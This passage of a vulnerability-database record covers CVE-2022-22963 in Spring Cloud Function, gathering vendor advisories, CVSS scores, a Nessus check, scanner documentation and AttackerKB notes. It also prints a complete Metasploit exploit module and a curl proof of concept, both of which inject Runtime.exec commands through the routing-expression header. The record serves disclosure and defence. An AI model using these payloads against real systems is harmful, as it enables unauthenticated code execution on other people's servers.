"CISCO-SA-JAVA-SPRING-SCF-RCE-DQRHHJXH", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "We have released Spring Cloud Function [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) & [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) to address the following CVE report.\n\n * [CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://tanzu.vmware.com/security/cve-2022-22963>)\n\nPlease review the information in the CVE report and upgrade immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T00:53:00", "type": "spring", "title": "CVE report published for Spring Cloud Function", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-30T00:53:00", "id": "SPRING:5D790268422545C1CFB6959B07261E50", 
"href": "https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-07-14T13:48:44", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "osv", "title": "Spring Cloud Function Code Injection with a specially crafted SpEL as a routing expression", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-14T13:47:04", "id": "OSV:GHSA-6V73-FGF6-W5J7", "href": "https://osv.dev/vulnerability/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:21", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an 
unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n", "cvss3": {}, "published": "2022-03-30T22:38:41", "type": "metasploit", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T13:01:08", "id": "MSF:EXPLOIT-MULTI-HTTP-SPRING_CLOUD_FUNCTION_SPEL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/spring_cloud_function_spel_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. 
Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = 
{})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_cloud_function_spel_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-04-07T03:29:32", "description": "A remote code execution vulnerability exists in Spring Cloud Function. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Cloud Function Remote Code Execution (CVE-2022-22963)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "CPAI-2022-0096", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wizblog": [{"lastseen": "2023-07-21T20:20:00", "description": "Learn how to address Spring4Shell and CVE-2022-22963 RCE vulnerabilities in cloud environments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T05:00:39", "type": "wizblog", "title": "Addressing the Spring4Shell and CVE-2022-22963 RCE vulnerabilities in cloud environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-01T05:00:39", "id": "WIZBLOG:E7BB6906DDEB4849A11E483EC9AE559E", "href": "https://www.wiz.io/blog/addressing-recent-spring4shell-and-cve-2022-22963-rce-vulnerabilities-with-wiz", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "When using routing functionality in VMware Tanzu's Spring Cloud Function, it is possible for a user to provide a specially 
crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-25T00:00:00", "type": "cisa_kev", "title": "VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-08-25T00:00:00", "id": "CISA-KEV-CVE-2022-22963", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-09-26T15:32:12", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. 
A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Cloud Function SPEL Expression Injection (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CLOUD_CVE-2022-22963.NBIN", "href": "https://www.tenable.com/plugins/nessus/159375", "sourceData": "Binary data spring_cloud_CVE-2022-22963.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:29", "description": "The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in the routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a routing expression that may result in remote code execution on the remote host.", "cvss3": {}, "published": "2022-04-14T00:00:00", "type": "nessus", "title": "VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-23T00:00:00", "cpe": ["cpe:/a:vmware:spring_cloud_function"], "id": "SPRING_CVE-2022-22963_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159730", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159730);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\"CVE-2022-22963\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"VMware Spring Cloud Function < 3.1.7 / 3.2.x < 3.2.3 SPEL Expression Injection (local check)\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Spring Cloud Function running on the remote host is affected by a remote code execution vulnerability in\nthe routing functionality. A remote, unauthenticated attacker could provide a specially crafted SpEL as a\nrouting expression that may result in remote code execution on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22963\");\n # https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93cb5cd5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/hktalent/spring-spel-0day-poc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Cloud Function version 3.1.7 or 3.2.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Cloud Function SpEL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/28\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_cloud_function\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_spring_cloud_function_installed.nbin\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Spring Cloud Function');\n\nvar constraints = [\n {'fixed_version' : '3.1.7'},\n {'min_version' : '3.2', 'fixed_version' : '3.2.3'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2023-07-21T20:47:19", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n \n\n\nTo run the [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) SpringBoot application run this docker [container](<https://www.kitploit.com/search/label/Container> \"container\" ) [exposing](<https://www.kitploit.com/search/label/Exposing> \"exposing\" ) it to port 8080. 
Example:\n \n \n docker run -it -d -p 8080:8080 bobcheat/springboot-public \n \n\n## Exploit\n\nCurl command:\n \n \n curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\"touch /tmp/test\")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter' \n \n\nOr using [Burp](<https://www.kitploit.com/search/label/Burp> \"Burp\" ) suite:\n\n[](<https://github.com/darryk10/CVE-2022-22963/blob/main/burp-suite-exploit.png> \"$ \\(5\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEilWkK-FPAHhY2QeYOmsLsM-kP1C10az0AOqwJ_niOh9uN1mEZeepHZOtVxi-grt1ZtdY24_cFBoJNPX-0MksoeZtPnEknxVg_GyBumJdWB4TIadM3PpxhyFOT-oToifQDbxJBD3B2F5nR7kxEt6gKYVDAEiLqImwp-DUxjzKgdwb5mrgsKRqU3HDJK>)\n\n## Credits\n\n<https://github.com/hktalent/spring-spel-0day-poc>\n\n \n \n\n\n**[Download CVE-2022-22963](<https://github.com/darryk10/CVE-2022-22963> \"Download CVE-2022-22963\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:30:00", "type": "kitploit", "title": "CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:30:00", "id": "KITPLOIT:7586926896865819908", "href": "http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T20:47:11", "description": "# [](<https://blogger.googleusercontent.com/img/a/AVvXsEiq83rixQ33OKbmoWJi89WYHdc4DrLKjaF4Fb_oNC9eI-0dinGfghgU-ON86t-dvUArvvR4Uytjd8t4wjK3r0hSR6SojDsdxtk5oTYh9zXEVVj_Vwr5Jv4R77tpdZamnECE8jW0wK86UlAO3xZNSDsr5XlvkezzB-JxjKcV1r204vACkoGhTZ5kDzKX>)\n\n#### \n\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://camo.githubusercontent.com/50b8ab2234bbab2c18588a670936521d1ff5e59d5ca623a9a462da51a3ceafab/68747470733a2f2f646b68396568776b697363342e636c6f756466726f6e742e6e65742f7374617469632f66696c65732f38623637376131622d376335332d343062312d393333652d6531306635373163386262382d737072696e67347368656c6c2d44656d6f2e706e67> \"A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities \\(2\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhwUOGEkZWllztaONh15l-vccNxhEwBTiFlTp4EjnrWMxaQLx2Jazoo4d04LSQWwsomwL48sBTjfRoxCS0VtEC6FgI6jUjnQBbh_-dcDCKxovaU-2Su5R2LIHzccE1YG7A-NPawwE7dEld8q-n6CbDiSLi9-bW_6pwV8bvM5HRiVN9UHYqE9Y71sv4c>)\n\n# Features\n\n * Support for lists of URLs.\n * Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).\n * Fuzzing for HTTP GET and POST methods.\n * Automatic validation of the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) upon discovery.\n * Randomized and non-intrusive payloads.\n * WAF Bypass payloads.\n\n \n\n\n# Description\n\nThe Spring4Shell RCE is a critical vulnerability that FullHunt has been researching since it was released. 
We worked with our customers in scanning their environments for Spring4Shell and Spring Cloud RCE vulnerabilities.\n\nWe're open-sourcing an open detection scanning tool for discovering Spring4Shell (CVE-2022-22965) and Spring Cloud RCE (CVE-2022-22963) vulnerabilities. This shall be used by security teams to scan their infrastructure, as well as test for WAF bypasses that can result in achieving successful [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) of the organization's environment.\n\nIf your organization requires help, please contact (team at fullhunt.io) directly for a full attack surface [discovery](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) and scanning for the Spring4Shell vulnerabilities.\n\n# Usage\n\nManagement Platform. [\u2022] Secure your External Attack Surface with FullHunt.io. usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] optional arguments: -h, --help show this help message and exit -u URL, --url URL Check a single URL. -p PROXY, --proxy PROXY Send requests through proxy -l USEDLIST, --list USEDLIST Check a list of URLs. --payloads-file PAYLOADS_FILE Payloads file - [default: payloads.txt]. --waf-bypass Extend scans with WAF bypass payloads. --request-type REQUEST_TYPE Request Type: (get, post, all) - [Default: all]. --test-CVE-2022-22963 Test for [CVE-2022-22963](<https://www.kitploit.com/search/label/CVE-2022-22963> \"CVE-2022-22963\" ) (Spring Cloud RCE). \">\n \n \n $ ./spring4shell-scan.py -h \n [\u2022] CVE-2022-22965 - Spring4Shell RCE Scanner \n [\u2022] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. \n [\u2022] Secure your External Attack Surface with FullHunt.io. 
\n usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL Check a single URL. \n -p PROXY, --proxy PROXY \n Send requests through proxy \n -l USEDLIST, --list USEDLIST \n Check a list of URLs. \n --payloads-file PAYLOADS_FILE \n Payloads file - [default: payloads.txt]. \n --waf-bypass Extend scans with WAF bypass payloads. \n --request-type REQUEST_TYPE \n Request Type: (get, post, all) - [Default: all]. \n --test-CVE-2022-22963 \n Test for CVE-2022-22963 (Spring Cloud RCE).\n\n## Scan a Single URL\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local\n\n## Discover WAF bypasses against the environment\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local --waf-bypass\n\n## Scan a list of URLs\n \n \n $ python3 spring4shell-scan.py -l urls.txt\n\n## Include checks for Spring Cloud RCE (CVE-2022-22963)\n \n \n $ python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963 \n \n\n# Installation\n \n \n $ pip3 install -r requirements.txt \n \n\n# Docker Support\n \n \n git clone https://github.com/fullhunt/spring4shell-scan.git \n cd spring4shell-scan \n sudo docker build -t spring4shell-scan . \n sudo docker run -it --rm spring4shell-scan \n \n # With URL list \"urls.txt\" in current directory \n docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt\n\n# About FullHunt\n\nFullHunt is the next-generation attack surface management (ASM) platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.\n\nFullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. 
FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of spring4shell-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n# License\n\nThe project is licensed under MIT License.\n\n# Author\n\n_Mazin Ahmed_\n\n * Email: _mazin at FullHunt.io_\n * FullHunt: <https://fullhunt.io>\n * Website: <https://mazinahmed.net>\n * Twitter: <https://twitter.com/mazen160>\n * Linkedin: <http://linkedin.com/in/infosecmazinahmed>\n \n \n\n\n**[Download Spring4Shell-Scan](<https://github.com/fullhunt/spring4shell-scan> \"Download Spring4Shell-Scan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T21:30:00", "type": "kitploit", "title": "Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-24T21:30:00", "id": "KITPLOIT:6278364996548285306", "href": "http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-07-23T02:21:56", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 30, 2022 8:46pm UTC reported:\n\nCVE-2022-22963 is an unauthenticated remote code execution vulnerability within Spring Cloud Function prior to 3.1.7 and 3.2.3. This vulnerability should not be confused with the reported 0-day dubbed Spring4Shell that was disclosed at around the same time.\n\nThe cause of this vulnerability is an unsafe evaluation context for the [Spring Expression Language (SpEL)](<https://docs.spring.io/spring-framework/docs/3.2.x/spring-framework-reference/html/expressions.html>) that can be included in the `spring.cloud.function.routing-expression` header. By crafting a POST request with the header, an attacker may execute malicious SpEL queries resulting in code execution in the context of the Spring Cloud Function application.\n\nOne early PoC demonstrated that the SpEL query could be used to 